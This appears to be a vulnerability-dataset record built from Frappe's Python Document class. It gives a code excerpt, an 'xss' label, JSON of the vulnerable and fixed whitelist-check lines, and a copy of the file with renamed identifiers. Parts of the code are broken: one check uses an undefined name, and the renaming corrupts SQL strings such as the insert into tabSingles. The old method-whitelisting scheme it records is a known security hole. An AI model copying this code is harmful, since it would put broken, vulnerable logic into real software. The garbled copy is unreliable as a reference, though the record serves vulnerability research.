high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.flags.ignore_mandatory:
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
fields=", ".join((each[0] for each in missing)),
doctype=self.doctype,
name=self.name))
def _validate_links(self):
if self.flags.ignore_links or self._action == "cancel":
return
invalid_links, cancelled_links = self.get_invalid_links()
for d in self.get_all_children():
result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
invalid_links.extend(result[0])
cancelled_links.extend(result[1])
if invalid_links:
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
if cancelled_links:
msg = ", ".join((each[2] for each in cancelled_links))
frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
def run_method(self, method, *args, **kwargs):
"""run standard triggers, plus those in hooks"""
if "flags" in kwargs:
del kwargs["flags"]
if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
else:
# hack! to run hooks even if method does not exist
fn = lambda self, *args, **kwargs: None
fn.__name__ = str(method)
out = Document.hook(fn)(self, *args, **kwargs)
self.run_notifications(method)
run_webhooks(self, method)
run_server_script_for_doc_event(self, method)
return out
def run_trigger(self, method, *args, **kwargs):
return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
@whitelist.__func__
def _submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self.docstatus = 1
self.save()
@whitelist.__func__
def _cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self.docstatus = 2
self.save()
@whitelist.__func__
def submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self._submit()
@whitelist.__func__
def cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self._cancel()
def delete(self, ignore_permissions=False):
"""Delete document."""
frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:
- `validate`, `before_save` for **Save**.
- `validate`, `before_submit` for **Submit**.
- `before_cancel` for **Cancel**
- `before_update_after_submit` for **Update after Submit**
Will also update title_field if set"""
self.load_doc_before_save()
self.reset_seen()
# before_validate method should be executed before ignoring validations
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def load_doc_before_save(self):
"""Save load document from db before saving"""
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def clear_cache(self):
frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
"""Clear _seen property and set current user as seen"""
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
"""Publish realtime that the current document is modified"""
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
doctype=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
data = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
"""Set a value in the document object, update the timestamp and update the database.
WARNING: This method does not trigger controller validations and should
be used very carefully.
:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
:param value: value of the property to be updated
:param update_modified: default True. updates the `modified` and `modified_by` properties
:param notify: default False. run doc.notify_updated() to send updates via socketio
:param commit: default False. run frappe.db.commit()
"""
if isinstance(fieldname, dict):
self.update(fieldname)
else:
self.set(fieldname, value)
if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
# don't update modified timestamp if called from post save methods
# like on_update or on_submit
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
# to trigger notification on value change
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, fieldname, value,
self.modified, self.modified_by, update_modified=update_modified)
self.run_method('on_change')
if notify:
self.notify_update()
self.clear_cache()
if commit:
frappe.db.commit()
def db_get(self, fieldname):
"""get database value for this fieldname"""
return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
"""Check if document links to any active document before Cancel."""
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, method="Cancel")
check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
"""Save version info"""
# don't track version under following conditions
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
version = frappe.new_doc('Version')
if not self._doc_before_save:
version.for_insert(self)
version.insert(ignore_permissions=True)
elif version.set_diff(self._doc_before_save, self):
version.insert(ignore_permissions=True)
if not frappe.flags.in_migrate:
# follow since you made a change?
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
"""Decorator: Make method `hookable` (i.e. extensible by another app).
Note: If each hooked method returns a value (dict), then all returns are
collated in one dict and returned. Ideally, don't return values in hookable
methods, set properties in the document."""
def add_to_return_value(self, new_return_value):
if isinstance(new_return_value, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(new_return_value)
else:
self._return_value = new_return_value or self.get("_return_value")
def compose(fn, *hooks):
def runner(self, method, *args, **kwargs):
add_to_return_value(self, fn(self, *args, **kwargs))
for f in hooks:
add_to_return_value(self, f(self, method, *args, **kwargs))
return self._return_value
return runner
def composer(self, *args, **kwargs):
hooks = []
method = f.__name__
doc_events = frappe.get_doc_hooks()
for handler in doc_events.get(self.doctype, {}).get(method, []) \
+ doc_events.get("*", {}).get(method, []):
hooks.append(frappe.get_attr(handler))
composed = compose(f, *hooks)
return composed(self, method, *args, **kwargs)
return composer
def is_whitelisted(self, method_name):
method = getattr(self, method_name, None)
if not fn:
raise NotFound("Method {0} not found".format(method_name))
is_whitelisted(getattr(method, '__func__', method))
def validate_value(self, fieldname, condition, val2, doc=None, raise_exception=None):
"""Check that value of fieldname should be 'condition' val2
else throw Exception."""
error_condition_map = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not doc:
doc = self
val1 = doc.get_value(fieldname)
df = doc.meta.get_field(fieldname)
val2 = doc.cast(val2, df)
if not frappe.compare(val1, condition, val2):
label = doc.meta.get_label(fieldname)
condition_str = error_condition_map.get(condition, condition)
if doc.parentfield:
msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
else:
msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)
# raise passed exception or True
msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
def queue_action(self, action, **kwargs):
"""Run an action in background. If the action has an inner function,
like _submit for submit, it will call that instead"""
# call _submit instead of submit, so you can override submit to call
# run_delayed based on some action
# See: Stock Reconciliation
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + action):
action = '_' + action
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
action=action, **kwargs)
def lock(self, timeout=None):
"""Creates a lock file for the given document. If timeout is set,
it will retry every 1 second for acquiring the lock again
:param timeout: Timeout in seconds, default 0"""
signature = self.get_signature()
if file_lock.lock_exists(signature):
lock_exists = True
if timeout:
for i in range(timeout):
time.sleep(1)
if not file_lock.lock_exists(signature):
lock_exists = False
break
if lock_exists:
raise frappe.DocumentLockedError
file_lock.create_lock(signature)
def unlock(self):
"""Delete the lock file for this document"""
file_lock.delete_lock(self.get_signature())
# validation helpers
def validate_from_to_dates(self, from_date_field, to_date_field):
"""
Generic validation to verify date sequence
"""
if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(to_date_field)),
frappe.bold(self.meta.get_label(from_date_field)),
), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
def add_tag(self, tag):
"""Add a Tag to this document"""
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
"""Return a list of Tags attached to this document"""
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
"""Execute an action on a document (called by background worker)"""
doc = frappe.get_doc(doctype, name)
doc.unlock()
try:
getattr(doc, action)(**kwargs)
except Exception:
frappe.db.rollback()
# add a comment (?)
if frappe.local.message_log:
msg = json.loads(frappe.local.message_log[-1]).get('message')
else:
msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
doc.notify_update()
| xss | {
"code": [
"from frappe import _, msgprint",
"\tdef whitelist(f):",
"\t\tf.whitelisted = True",
"\t\treturn f",
"\tdef is_whitelisted(self, method):",
"\t\tfn = getattr(self, method, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method))",
"\t\telif not getattr(fn, \"whitelisted\", False):",
"\t\t\traise Forbidden(\"Method {0} not whitelisted\".format(method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1155,
1156
]
} | {
"code": [
"from frappe import _, msgprint, is_whitelisted",
"\tdef whitelist(fn):",
"\t\tfrappe.whitelist()(fn)",
"\t\treturn fn",
"\tdef is_whitelisted(self, method_name):",
"\t\tmethod = getattr(self, method_name, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method_name))",
"\t\tis_whitelisted(getattr(method, '__func__', method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1156
]
} |
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_81
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
if VAR_0:
if isinstance(VAR_0[0], BaseDocument):
return VAR_0[0]
elif isinstance(VAR_0[0], string_types):
VAR_2 = VAR_0[0]
elif isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(VAR_0) < 2 and VAR_1:
if 'doctype' in VAR_1:
VAR_2 = VAR_1['doctype']
else:
raise ValueError('"doctype" is a required key')
VAR_5 = get_controller(VAR_2)
if VAR_5:
return VAR_5(*VAR_0, **VAR_1)
raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
VAR_6.whitelisted = True
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_80 = frappe.db.get_singles_dict(self.doctype)
if not VAR_80:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_80["name"] = self.doctype
del VAR_80["__islocal"]
super(CLASS_0, self).__init__(VAR_80)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_81 = DOCTYPE_TABLE_FIELDS
else:
VAR_81 = self.meta.get_table_fields()
for VAR_19 in VAR_81:
VAR_50 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_50:
self.set(VAR_19.fieldname, VAR_50)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
	def FUNC_11(self, VAR_11=None, VAR_17=None):
		"""Save (insert or update) this document.

		VAR_11: override the ignore_permissions flag.
		VAR_17: override the ignore_version flag (defaults to True when
		running tests). Returns self.
		"""
		if self.flags.in_print:
			return
		self.flags.notifications_executed = []
		if VAR_11!=None:
			self.flags.ignore_permissions = VAR_11
		self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
		# brand-new or unnamed documents are inserted instead of updated
		if self.get("__islocal") or not self.get("name"):
			self.insert()
			return
		self.check_permission("write", "save")
		self.set_user_and_timestamp()
		self.set_docstatus()
		self.check_if_latest()
		self.set_parent_in_children()
		self.set_name_in_children()
		self.validate_higher_perm_levels()
		self._validate_links()
		self.run_before_save_methods()
		if self._action != "cancel":
			self._validate()
		if self._action == "update_after_submit":
			self.validate_update_after_submit()
		self.set_docstatus()
		if self.meta.issingle:
			self.update_single(self.get_valid_dict())
		else:
			self.db_update()
		self.update_children()
		self.run_post_save_methods()
		if hasattr(self, "__unsaved"):
			delattr(self, "__unsaved")
		return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_82 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_82.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
	def FUNC_14(self, VAR_18, VAR_19=None):
		"""Sync one child table to the database: update rows still present
		in memory and delete rows that were removed from the document.

		VAR_18: the table fieldname; VAR_19: its DocField (looked up if None).
		"""
		VAR_48 = []
		if not VAR_19:
			VAR_19 = self.meta.get_field(VAR_18)
		for VAR_21 in self.get(VAR_19.fieldname):
			VAR_21.db_update()
			VAR_48.append(VAR_21.name)
		# some child doctypes may be explicitly excluded from deletion
		if VAR_19.options in (self.flags.ignore_children_type or []):
			return
		if VAR_48:
			# delete db rows of this parent no longer present in memory
			VAR_83 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
				and VAR_24=%s and VAR_34=%s
				and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_48))),
				[self.name, self.doctype, VAR_18] + VAR_48)
			if len(VAR_83) > 0:
				frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
					','.join(['%s'] * len(VAR_83))), tuple(row[0] for row in VAR_83))
		else:
			# no rows left in memory: clear the whole table for this parent
			frappe.db.sql("""delete from `tab{0}` where parent=%s
				and VAR_24=%s and VAR_34=%s""".format(VAR_19.options),
				(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_49 = self.get_doc_before_save()
return VAR_49.get(VAR_18)!=self.get(VAR_18) if VAR_49 else True
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
if self.flags.name_set and not VAR_20:
return
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if VAR_15:
self.name = VAR_15
else:
FUNC_17(self)
if VAR_16:
for VAR_21 in self.get_all_children():
FUNC_17(VAR_21)
self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_84 = self.as_dict()
for VAR_43, VAR_26 in iteritems(VAR_84):
if VAR_26==None:
VAR_84[VAR_43] = ""
return VAR_84
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_84 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
	def FUNC_23(self):
		"""Run the standard field-level validations on this document and on
		every child row: mandatory fields, data/select/length checks,
		non-negative numerics, content sanitization, password storage and
		workflow validation."""
		self._validate_mandatory()
		self._validate_data_fields()
		self._validate_selects()
		self._validate_non_negative()
		self._validate_length()
		self._extract_images_from_text_editor()
		self._sanitize_content()
		self._save_passwords()
		self.validate_workflow()
		VAR_50 = self.get_all_children()
		for VAR_21 in VAR_50:
			VAR_21._validate_data_fields()
			VAR_21._validate_selects()
			VAR_21._validate_non_negative()
			VAR_21._validate_length()
			VAR_21._extract_images_from_text_editor()
			VAR_21._sanitize_content()
			VAR_21._save_passwords()
		if self.is_new():
